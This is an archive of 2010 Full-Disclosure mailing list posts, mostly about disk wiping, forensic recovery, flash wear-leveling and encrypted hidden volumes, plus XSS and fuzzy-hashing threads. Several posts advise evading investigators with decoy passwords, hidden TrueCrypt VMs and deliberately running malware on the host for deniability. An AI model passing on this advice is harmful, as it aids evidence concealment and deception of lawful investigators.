Desktop, Windows EFS and all manners of configurations of those
products, including the hidden container features of DCPP and TC.

I am familiar with computer forensics, computer forensic methods, and
anti-forensics. Furthermore I have working knowledge of the various
one-way hashes, symmetric and asymmetric encryption algorithms.
Working knowledge of the various block-cipher modes and what the
differences are between them.

From firsthand experience with the courts I am familiar with their
tool dependence and what they can and cannot grab and why.

From simple logic it is plain to see that filling a drive with content
from wikipedia, some n-gram algorithm or other source would be
worthless. A waste of time and effort.

This is because a drive full of zeros, a drive full of random bits and
a drive full of random word garbage are equivalent.

Some obfuscating filesystem that does -not- use encryption is as
worthless as a generic F-S. If the content on your drive is worth
grabbing the investigating authorities can and will reverse engineer
it.

As everyone has told you, encrypt with a FDE product from the start or
simply wipe your drive to nulls or garbage.

If you are very paranoid use my solution of a hidden container
containing a VM that you use for anything 'private.' Make sure your
host OS has a ream of malware running on it preferably pointed to
non-existent C&C channels, or using PKI where nobody has the
private key.

-Travis

On Wed, Jan 27, 2010 at 11:18 AM, Bipin Gautam  wrote:
> Really? How much do you know of computer forensics? Care to Double
> clicked a few forensic tools first
>
> I bring up this issue here because as you can see the laws are
> different in different country and at places just "possession" of a
> questionable content is a crime, without much analysis from where did
> it come from. Such a logic doesnt hold much water from a technical
> prospective, that is what i was trying to discuss. (but you were so
> much concerned about my english lol )
>
> We were talking on a NEW topic, But if truecrypt is all you know, then
> download truecrypt and add a "custom cascade of ciphers" to your
> truecrypt source code... so that your truecrypt hidden volume will be
> very hard to bruteforced with off the self tools (which is what most
> forensic examiners do, they are tool dependent).
>
> (i  wish to make fun of you, but maybe another email! ;)
>
>
> -bipin
>
>
> On 1/27/10, T Biehn  wrote:
>> You made the argument against yourself; apparently you didn't comprehend the
>> points made in 90% of the on-topic responses to this thread.
>>
>> On Jan 27, 2010 9:34 AM, "Bipin Gautam"  wrote:
>>
>> McGhee & T Biehn !
>>
>> Thank you for putting up your "best" argument sadly that is the
>> BEST technical thing you happen to pick. in this topic to
>> comment about
>>
>> -bipin
>>
>> On 1/27/10, McGhee, Eddie  wrote: > and also lol @
>> maybe USELESS, try making ...
>>
>>> mailto:bipin.gau...@gmail.com>> wrote: > > Enough
>> noise, Lets wrap up: > >...
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-27 Thread T Biehn
You made the argument against yourself; apparently you didn't comprehend the
points made in 90% of the on-topic responses to this thread.

On Jan 27, 2010 9:34 AM, "Bipin Gautam"  wrote:

McGhee & T Biehn !

Thank you for putting up your "best" argument sadly that is the
BEST technical thing you happen to pick. in this topic to
comment about

-bipin

On 1/27/10, McGhee, Eddie  wrote: > and also lol @
maybe USELESS, try making ...

> mailto:bipin.gau...@gmail.com>> wrote: > > Enough
noise, Lets wrap up: > >...

Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-27 Thread T Biehn
No you don't understand, your premise is shit. Research what's already being
done instead of trying to improve what you don't understand.

lol @ ddos.

On Jan 26, 2010 11:09 PM, "Bipin Gautam"  wrote:

Enough noise, Lets wrap up:

Someone said: "Forensics requires more than merely finding a phrase or
file on a hard drive - it requires establishing the context. If a
court accepts evidence without that context, then the defendant should
appeal on the basis of having an incompetent lawyer."

So, any evidence/broken-text/suspicious phrases etc found in a
computer "without meta-data" maybe USELESS... REMEMBER.


Having a normal OS with forensic signature ZERO would be a simple yet
powerful project. Programmers??? it isnt difficult work. few
months, 1 person project.

Worm defense is smart as well as deadlock at times, the prospective i
presented can be used as a FALLBACK at times.


Maybe something like Alice/chatterbox run through the
free/slack/etc... space of your 1 TB harddisk is a intellectual dDoS!


Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Unknown malware? Infections recently deleted by A/V?

The realm of data ownership is ridiculous. If I run a wifi AP with
WEP or no auth, my router keeps no logs, and my computer is a host to
malware then I would imagine that I cannot be convicted of a computer
crime without verification by physical surveillance.

If given the choice by a lawyer between pleading guilty and receiving
a lenient punishment and pleading not-guilty to certain loss for
severe punishment in the face of 'irrefutable' evidence most people
will choose to plead guilty. Prosecutors, Lawyers, and defendants are
largely either ignorant or apathetic to the issues around proving
culpability in computer-crime.

And case law would back me up.

-Travis

On Tue, Jan 26, 2010 at 3:11 AM, Charles Skoglund
 wrote:
> This discussion is getting weirder and weirder. If an examiner finds
> evidence on YOUR computer / cell phone / usb disks / whatever, please do
> tell me how it's not necessarily yours? By claiming your computer has been
> hacked? You do know an examiner usually knows how to double-check your story
> for malicious code right? Or what are you guys talking about?
>
> My experience is that when I find the evidence, the person/s being
> investigated confesses quite rapidly.
>
> Cheers!
>
>
>
> On 1/26/10 4:31 AM, "Bipin Gautam"  wrote:
>
>> So to the point, the techniques of forensic examiners were flawed from
>> day one given that any text/evidence found on your computer is NOT
>> NECESSARILY yours! Does that break digital forensics?
>> oops.
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
I should have brought up the increased density problem Valdis, excellent points.

-Travis

On Tue, Jan 26, 2010 at 1:26 PM,   wrote:
> On Tue, 26 Jan 2010 11:11:52 EST, T Biehn said:
>> Overwritten files require analysis with a 'big expensive machine.'
>
> Assuming a disk drive made this century, if the block has actually been
> overwritten with any data even *once*, it is basically unrecoverable using any
> available tech.
>
> Proof: In a decade of looking, I haven't found a *single* data-recovery outfit
> that claimed to recover from even a single overwrite.  Blown partition table?
> No problem. Metadata overwritten, data not? We can scavenge the blocks. Disk
> been in a fire? Flood? Run over by truck? Sure. We can go in and scavenge the
> individual intact bits with big expensive machines. Overwritten? .
>
> Seriously - lot of companies can recover data by reading the magnetic fields of
> intact data.  But anybody know of one that claims it can recover actual
> over-writes, as opposed to "damn we erased it" or "damn the first part of the
> disk is toast"?
>
> No?  Nobody knows of one?  I didn't think so.
>
> 20 or 25 years ago, it may still have been feasible to use gear to measure the
> residual magnetism in the sidebands after an over-write.   However, those
> sidebands have shrunk drastically, as they are the single biggest problem when
> trying to drive densities higher.  You can't afford a sideband anymore - if
> you have one, it's overlapping the next bit.
>
> There *may* be some guys inside the spook agencies able to recover overwrites.
> But you don't need to worry about any evidence so recovered ever being used
> against you in a court of law - as then they'd have to admit they could do it.
> Just like in WWII we allowed the German U-boats to sink our convoys rather
> than let them figure out we had broken Enigma, they'll let the prosecution
> fail rather than admit where the data came from.
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Are you suggesting that consumer magnet-based storage solutions use
the same technology that the recovery machines use to store more than
one bit in what you consider a 'single bit location' ?
I think it would be cost and space prohibitive, not dependent on any algorithm.
If I'm thinking correctly, and I have no real idea how the recovery
process works, the recovery machines measure minute variance in the
analog magnetic signal directly pulled from the platters to figure out
what bits 'used' to be on the disk in that location. I sincerely doubt
that anything consumer accessible would be able to work with that. I
also doubt that it is exact, and protocols probably use probabilistic
methods for extraction of a given content; text for example.
Given a block of bits, the signal variance from 'clean' on those bits
(eg if never written) is x.
x is matched with a dictionary of known text.

Anyone know to confirm?

-Travis

On Tue, Jan 26, 2010 at 11:15 AM, Christian Sciberras  wrote:
> It would be a part of the algorithm, to make sure the overwritten file is
> readable. But if those machines get any smaller, I guess these would be the
> next generation of storage media take bluerays vs dvds for example.
>
>
>
>
> On Tue, Jan 26, 2010 at 5:11 PM, T Biehn  wrote:
>>
>> Overwritten files require analysis with a 'big expensive machine.'
>> I doubt they ever recover the full file.
>>
>> -Travis
>>
>> On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras 
>> wrote:
>> > I was thinking, since all this (reasonable) fuss on wiping a disk over
>> > 10
>> > times to ensure non-readability, how come we're yet very limited on
>> > space
>> > usage?
>> > If, for example, I overwrote a bitmap file with a text one, what stops
>> > the
>> > computer from recovering/storing both (without using additional space)?
>> > Just a couple curiosities of mine.
>> >
>> >
>> >
>> >
>> >
>> > On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
>> >  wrote:
>> >>
>> >> > By the way, does somebody knows about the flash memory?
>> >> > Is zeroing a whole usb key enough to make the data unrecoverable?
>> >> >
>> >>
>> >> No, wear-leveling (done at the memory controller level) will
>> >> dynamically
>> >> re-map addresses on the actual flash chip to ensure a relatively
>> >> consistent number of write cycles across the entire drive.
>> >>
>> >> The only way to completely "wipe" a flash disk is with a hammer.
>> >>
>> >> Regards,
>> >>
>> >> Michael Holstein
>> >> Cleveland State University
>> >>
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Overwritten files require analysis with a 'big expensive machine.'
I doubt they ever recover the full file.

-Travis

On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras  wrote:
> I was thinking, since all this (reasonable) fuss on wiping a disk over 10
> times to ensure non-readability, how come we're yet very limited on space
> usage?
> If, for example, I overwrote a bitmap file with a text one, what stops the
> computer from recovering/storing both (without using additional space)?
> Just a couple curiosities of mine.
>
>
>
>
>
> On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
>  wrote:
>>
>> > By the way, does somebody knows about the flash memory?
>> > Is zeroing a whole usb key enough to make the data unrecoverable?
>> >
>>
>> No, wear-leveling (done at the memory controller level) will dynamically
>> re-map addresses on the actual flash chip to ensure a relatively
>> consistent number of write cycles across the entire drive.
>>
>> The only way to completely "wipe" a flash disk is with a hammer.
>>
>> Regards,
>>
>> Michael Holstein
>> Cleveland State University
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
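
The wear-leveling remapping Michael Holstein describes in the reply quoted above, as an added Python model that is not part of the original thread. The controller policy, page counts and all names are constructed for illustration; real controllers differ and do not expose their mapping to the host.

```python
"""Toy flash translation layer: zeroing every logical block does not
necessarily touch every physical page. Constructed model, not real firmware."""

ZERO = b"\x00" * 8


class ToyFlash:
    def __init__(self, physical_pages=12, logical_blocks=8):
        if physical_pages <= logical_blocks:
            raise ValueError("model needs spare (over-provisioned) pages")
        self.logical_blocks = logical_blocks
        self.pages = [None] * physical_pages        # None = erased page
        self.erase_counts = [0] * physical_pages    # wear per physical page
        self.l2p = {}                               # logical block -> physical page

    def _allocate(self):
        """Pick the physical page for the next write (wear-leveling policy)."""
        live = set(self.l2p.values())
        spare = [p for p in range(len(self.pages)) if p not in live]
        erased = [p for p in spare if self.pages[p] is None]
        if erased:
            # Prefer an already-erased page with the least wear.
            return min(erased, key=lambda p: (self.erase_counts[p], p))
        # Nothing erased: garbage-collect the least-worn stale page.
        victim = min(spare, key=lambda p: (self.erase_counts[p], p))
        self.pages[victim] = None
        self.erase_counts[victim] += 1
        return victim

    def write(self, lba, data):
        if not 0 <= lba < self.logical_blocks:
            raise IndexError("logical block out of range")
        target = self._allocate()
        self.pages[target] = data
        # Remap. The previous physical page becomes stale but keeps its
        # contents until garbage collection erases it.
        self.l2p[lba] = target

    def read(self, lba):
        page = self.l2p.get(lba)
        return ZERO if page is None else self.pages[page]


def zero_fill(flash):
    """What a host-side 'zero the whole device' pass does: one write per LBA."""
    for lba in range(flash.logical_blocks):
        flash.write(lba, ZERO)


def host_view(flash):
    """Everything the operating system can read back through the controller."""
    return [flash.read(lba) for lba in range(flash.logical_blocks)]


def raw_remnants(flash, marker=b"SECRET"):
    """Physical pages still holding marked data, as a chip-level read would see."""
    return sorted(p for p, d in enumerate(flash.pages) if d and d.startswith(marker))


def demo():
    flash = ToyFlash()
    for lba in range(4):                      # constructed sample data
        flash.write(lba, b"SECRET-%d" % lba)
    zero_fill(flash)
    after_one_pass = (host_view(flash), raw_remnants(flash))
    # In this model a second pass happens to recycle the stale pages; the
    # host cannot verify that on a real device, whose spare area and
    # garbage-collection policy are hidden behind the controller.
    zero_fill(flash)
    after_two_passes = raw_remnants(flash)
    return after_one_pass, after_two_passes


if __name__ == "__main__":
    (view, remnants), later = demo()
    print("host sees only zeros:", all(b == ZERO for b in view))
    print("physical pages still holding data after one pass:", remnants)
    print("after a second pass (this model only):", later)
```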


Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Oh yeah, another note: If you use a chaining block cipher then you
only need to wipe the first block to make the rest of your data
unrecoverable. Most FDE's actually use a pw to decrypt the actual
decryption key, that block functions much the same, if you can wipe
that then the rest of the data is unusable.
Note, anyone who has pulled your key from memory via trojan or other
means at an earlier time will be able to recover your data unless the
first block of the stream has been wiped. This might be common
practice in sneak and peek routines.

-Travis

On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras  wrote:
> I was thinking, since all this (reasonable) fuss on wiping a disk over 10
> times to ensure non-readability, how come we're yet very limited on space
> usage?
> If, for example, I overwrote a bitmap file with a text one, what stops the
> computer from recovering/storing both (without using additional space)?
> Just a couple curiosities of mine.
>
>
>
>
>
> On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
>  wrote:
>>
>> > By the way, does somebody knows about the flash memory?
>> > Is zeroing a whole usb key enough to make the data unrecoverable?
>> >
>>
>> No, wear-leveling (done at the memory controller level) will dynamically
>> re-map addresses on the actual flash chip to ensure a relatively
>> consistent number of write cycles across the entire drive.
>>
>> The only way to completely "wipe" a flash disk is with a hammer.
>>
>> Regards,
>>
>> Michael Holstein
>> Cleveland State University
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
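
An added illustration (not from the thread or from any FDE product) of the key-wrapping layout the post above describes: a password-derived key unwraps a random master key, so overwriting the small key slot leaves the ciphertext undecryptable with the password, while a master key copied from memory earlier still decrypts it. The SHA-256 counter-mode keystream is a stand-in cipher, and every name and size here is an assumption.

```python
import hashlib
import hmac
import os

SALT_LEN, KEY_LEN, TAG_LEN = 16, 32, 32
SLOT_SIZE = SALT_LEN + KEY_LEN + TAG_LEN  # salt | wrapped master key | MAC


def _keystream(key: bytes, label: bytes, length: int) -> bytes:
    """Stand-in stream cipher (SHA-256 in counter mode), for illustration only."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + label + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def _xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def _kek(password: bytes, salt: bytes) -> bytes:
    """Key-encryption key derived from the password."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 10_000)


def format_volume(password: bytes, plaintext: bytes):
    """Return (key_slot, ciphertext, master_key) for a hypothetical volume."""
    master_key = os.urandom(KEY_LEN)      # the key that encrypts the data
    salt = os.urandom(SALT_LEN)
    kek = _kek(password, salt)
    wrapped = _xor(master_key, _keystream(kek, b"wrap", KEY_LEN))
    tag = hmac.new(kek, wrapped, hashlib.sha256).digest()
    ciphertext = _xor(plaintext, _keystream(master_key, b"data", len(plaintext)))
    return salt + wrapped + tag, ciphertext, master_key


def unlock(password: bytes, key_slot: bytes):
    """Unwrap the master key; None if the password is wrong or the slot is wiped."""
    salt = key_slot[:SALT_LEN]
    wrapped = key_slot[SALT_LEN:SALT_LEN + KEY_LEN]
    tag = key_slot[SALT_LEN + KEY_LEN:SLOT_SIZE]
    kek = _kek(password, salt)
    expected = hmac.new(kek, wrapped, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return _xor(wrapped, _keystream(kek, b"wrap", KEY_LEN))


def read_volume(master_key: bytes, ciphertext: bytes) -> bytes:
    return _xor(ciphertext, _keystream(master_key, b"data", len(ciphertext)))


def demo() -> dict:
    password = b"correct horse"                    # constructed sample value
    secret = b"constructed sample payload " * 4    # constructed sample value
    slot, ciphertext, master_key = format_volume(password, secret)
    captured_key = master_key   # models a key copied from RAM before the wipe

    readable_before = read_volume(unlock(password, slot), ciphertext) == secret
    wiped_slot = bytes(SLOT_SIZE)   # overwrite only the key slot with zeros
    return {
        "before_wipe": readable_before,
        "after_wipe_password_works": unlock(password, wiped_slot) is not None,
        "captured_key_still_decrypts":
            read_volume(captured_key, ciphertext) == secret,
        "bytes_overwritten": SLOT_SIZE,
        "bytes_left_untouched": len(ciphertext),
    }


if __name__ == "__main__":
    print(demo())
```

On wear-levelled flash the overwrite of the key slot is subject to the same address remapping described in the quoted reply, so the old slot contents may survive on the chip.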



Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-26 Thread T Biehn
Entropy vs zeros vs random content.

Plausible deniability will only be there if there is legitimate data
that looks like it's been used and the prosecutor cannot construe any
of your data as that used for wiping or otherwise obscuring the data
on your drive. If you don't have this you better request a trial by
judge rather than jury.

Now;
Your best solution is to use an exterior OS on FDE, then, in a TC
Hidden Disk container have a VM image that you use for 'hidden works.'
You can hand over your FDE's PW and location of TC disk including the
exterior password for great fed win.

-Travis

On Tue, Jan 26, 2010 at 10:08 AM, Michael Holstein
 wrote:
>
>> By the way, does somebody knows about the flash memory?
>> Is zeroing a whole usb key enough to make the data unrecoverable?
>>
>
> No, wear-leveling (done at the memory controller level) will dynamically
> re-map addresses on the actual flash chip to ensure a relatively
> consistent number of write cycles across the entire drive.
>
> The only way to completely "wipe" a flash disk is with a hammer.
>
> Regards,
>
> Michael Holstein
> Cleveland State University
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes

2010-01-20 Thread T Biehn
"Do you really want to be buying
an entire operating system from somebody who just admitted they can't even
produce a workable browser with all their resources?"

Valdis makes the novice assumption that people consider valuations of
this sort when buying the newest iteration of Microsoft products. The
idea that consumers would actually consider an alternative to what is
an effectively locked in platform is laughable. The suggestion that
they might find such a move to be of any relevance or impact on their
purchasing decision is insane.


On Wed, Jan 20, 2010 at 1:00 PM,   wrote:
> On Wed, 20 Jan 2010 10:38:34 EST, James Matthews said:
>
>> Why doesn't microsoft throw some of its weight behind Mozilla and ditch IE
>> forever. It doesn't suit their image.
>
> Unfortunately, the PR doesn't work that way.  Do you really want to be buying
> an entire operating system from somebody who just admitted they can't even
> produce a workable browser with all their resources?
>
> (Note this works differently in the Linux world, where the kernel crew doesn't
> even pretend to write browsers, and the Firefox crew *just* does browsers, and
> somebody else *just* does OpenOffice, and distros (for the most part) just
> worry about integration issues, and everybody only claims to do their little
> part well)
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] MouseOverJacking attacks

2010-01-19 Thread T Biehn
Hello MustLive!
Thanking you for taking a personal approach to all of your list admirers!

Prosperous futures abound!

A missive granted in thy honor sweet prince of XSS.

On Sun, Jan 17, 2010 at 4:33 PM, MustLive  wrote:
> Hello Travis!
>
> Thanks for your attention to my article about MouseOverJacking attacks.
>
>> If you read the HTML specification you can find all sorts of XSS
>> attack vectors that people just assumed would be redundant to write
>> entire articles on!
>
> Yes, I'm familiar with HTML specification (as web developer from beginning
> of 1999) and I know about different events in HTML. And as web security
> professional I know a lot of XSS vectors.
>
> Many of the events in HTML are not widespread enough (or not usable enough) for
> XSS attacks to write entire articles about them, but such ones as onclick
> and onmouseover are those which are worth entire articles. A lot was said
> about attacks via onclick in 2008, so I decided to talk about onmouseover in
> 2009 (because it is worth it).
>
> P.S.
>
> Because Jeff is already in my blacklist, as I mentioned to the list, there is
> no need to send me his letters in the future. If you decide to answer me,
> then write to me directly.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> - Original Message - From: "T Biehn" 
> To: "Jeff Williams" 
> Cc: "MustLive" ;
> 
> Sent: Tuesday, January 05, 2010 4:53 PM
> Subject: Re: [Full-disclosure] MouseOverJacking attacks
>
>
>> Hey MustLive!
>> If you read the HTML specification you can find all sorts of XSS
>> attack vectors that people just assumed would be redundant to write
>> entire articles on!
>>
>> Here!
>> http://www.w3.org/TR/REC-html40/interact/scripts.html
>>
>> -Travis
>>
>> On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams 
>> wrote:
>>>
>>> Thanks for your wishes MustDie;
>>>
>>> Do you consider yourself as an oz XSS ninja ?
>>>
>>> Did your C.V. ended in the OWASP trash bin ?
>>>
>>> And how the fuck you came up with a nickname like that ?
>>>
>>>
>>>
>>> Let us know, we truly give a shit about your life, and xss.
>>>
>>>
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread T Biehn
I can see what you're saying, it could be useful for finding
differences in different versions of the same binary but from what I
can see Joxean's app is meant to group files of the same 'type,' not
provide 'diff' capabilities.

-Travis

On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky  wrote:
> I looked into a fair amount of this sort of normalization back when I was
> playing with dotplots.  The idea was to upgrade from simple Levenshtein
> string comparison (with no knowledge of variable length x86 instructions,
> pointers that shift from compile to compile, etc) to something with at least
> some domain specific knowledge.  What I found, somewhat surprisingly, was
> that dumb string comparison was more than enough.  In fact, when I compared
> pre-patch and post-patch builds, it was easy to directly see when content
> was added, removed, shifted in location, etc.  Joxean's going to have much
> the same result -- as basic as his similarity metric is, he'll get the broad
> strokes just fine.
>
> Ultimately the best approach is to build a graph of how functions interact
> and measure graph isomorphism, but of course Halvar figured that out years
> ago :)
>
> On Tue, Jan 5, 2010 at 3:41 PM, T Biehn  wrote:
>>
>> Hmm,
>> Wouldn't it be more useful to the sec community to have an algorithm
>> that abstracts at the -interpreted- content level? That is, when
>> analyzing binaries I wouldn't think that this would classify two with
>> near identical functionality together, even though it is removing a
>> significant chunk of information during the hash pass.
>>
>> I would largely assume that your algorithm, as is, works best on
>> uncompressed bitmaps. Is there something I'm missing?
>>
>> -Travis
>>
>> On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret  wrote:
>> > Hi all,
>> >
>> > I'm happy to announce the very first public release of the open source
>> > project DeepToad, a tool for computing fuzzy hashes from files.
>> >
>> > DeepToad can generate signatures, clusterize files and/or directories
>> > and compare them. It's inspired in the very good tool ssdeep [1] and, in
>> > fact, both projects are very similar.
>> >
>> > The complete project is written in pure python and is distributed under
>> > the LGPL license [2].
>> >
>> > Links:
>> > Project's Web Page http://code.google.com/p/deeptoad/
>> > Download Web Page http://code.google.com/p/deeptoad/downloads/list
>> > Wiki http://code.google.com/p/deeptoad/w/list
>> >
>> > References:
>> > [1] http://ssdeep.sourceforge.net/
>> > [2] http://www.gnu.org/licenses/lgpl.html
>> >
>> > Regards && Happy new year!
>> > Joxean Koret
>> >
>> >
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] MouseOverJacking attacks

2010-01-05 Thread T Biehn
Hey MustLive!
If you read the HTML specification you can find all sorts of XSS
attack vectors that people just assumed would be redundant to write
entire articles on!

Here!
http://www.w3.org/TR/REC-html40/interact/scripts.html

-Travis

On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams  wrote:
> Thanks for your wishes MustDie;
>
> Do you consider yourself as an oz XSS ninja ?
>
> Did your C.V. ended in the OWASP trash bin ?
>
> And how the fuck you came up with a nickname like that ?
>
>
>
> Let us know, we truly give a shit about your life, and xss.
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread T Biehn
Hmm,
Wouldn't it be more useful to the sec community to have an algorithm
that abstracts at the -interpreted- content level? That is, when
analyzing binaries I wouldn't think that this would classify two with
near identical functionality together, even though it is removing a
significant chunk of information during the hash pass.

I would largely assume that your algorithm, as is, works best on
uncompressed bitmaps. Is there something I'm missing?

-Travis

On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret  wrote:
> Hi all,
>
> I'm happy to announce the very first public release of the open source
> project DeepToad, a tool for computing fuzzy hashes from files.
>
> DeepToad can generate signatures, clusterize files and/or directories
> and compare them. It's inspired in the very good tool ssdeep [1] and, in
> fact, both projects are very similar.
>
> The complete project is written in pure python and is distributed under
> the LGPL license [2].
>
> Links:
> Project's Web Page http://code.google.com/p/deeptoad/
> Download Web Page http://code.google.com/p/deeptoad/downloads/list
> Wiki http://code.google.com/p/deeptoad/w/list
>
> References:
> [1] http://ssdeep.sourceforge.net/
> [2] http://www.gnu.org/licenses/lgpl.html
>
> Regards && Happy new year!
> Joxean Koret
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
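
An added sketch (not DeepToad's or ssdeep's code) of a context-triggered piecewise hash in the style of ssdeep, which the announcement names as its inspiration, run on constructed data. It shows a small patch keeping the score high while a byte-wise XOR re-encoding of identical content scores like unrelated data, the limitation raised in the question about the interpreted content level; window size, block size and all function names are assumptions.

```python
import random

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7   # bytes of context that decide where a chunk ends (assumed value)
BLOCK = 64   # average chunk length in bytes (assumed value)
FNV_OFFSET, FNV_PRIME = 0x811C9DC5, 0x01000193


def fuzzy_signature(data: bytes) -> str:
    """One character per content-defined chunk of the input."""
    sig = []
    window = bytearray(WINDOW)   # circular buffer of the last WINDOW bytes
    rolling = 0                  # sum of the bytes currently in the window
    chunk = FNV_OFFSET           # FNV-1a hash of the current chunk
    pending = False
    for i, byte in enumerate(data):
        chunk = ((chunk ^ byte) * FNV_PRIME) & 0xFFFFFFFF
        rolling += byte - window[i % WINDOW]
        window[i % WINDOW] = byte
        pending = True
        # The boundary depends only on the last WINDOW bytes, so boundaries
        # realign shortly after an insertion or deletion.
        if rolling % BLOCK == BLOCK - 1:
            sig.append(ALPHABET[chunk >> 26])   # top 6 bits pick the character
            chunk = FNV_OFFSET
            pending = False
    if pending:                                  # trailing partial chunk
        sig.append(ALPHABET[chunk >> 26])
    return "".join(sig)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance between two signatures."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(sig_a: str, sig_b: str) -> int:
    """Score from 0 (nothing in common) to 100 (identical signatures)."""
    longest = max(len(sig_a), len(sig_b))
    if longest == 0:
        return 100
    return round(100 * (1 - edit_distance(sig_a, sig_b) / longest))


def demo() -> dict:
    rng = random.Random(2010)                       # constructed sample input
    original = bytes(rng.randrange(256) for _ in range(4096))
    # Same file with a few bytes inserted, as between two builds.
    patched = original[:2000] + b"constructed patch bytes" + original[2000:]
    # Same content, trivially re-encoded: every byte differs.
    encoded = bytes(b ^ 0x5A for b in original)
    base = fuzzy_signature(original)
    return {
        "identical": similarity(base, fuzzy_signature(original)),
        "patched": similarity(base, fuzzy_signature(patched)),
        "xor_encoded": similarity(base, fuzzy_signature(encoded)),
    }


if __name__ == "__main__":
    print(demo())
```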



Re: [Full-disclosure] security hole on local ISP

2009-12-29 Thread T Biehn
This is a hiroshima versus 'harmless' mountain demonstration debate,
Lee. Because the post includes the raw data including ports, passwords
and ranges one must assume that "Cilia Pretel Gallo" was appealing to
the lowest common denominator, to a group of individuals where
checking NRO whois db for ETB's netblocks would not be an obvious
first step.

Ahem.

-Travis

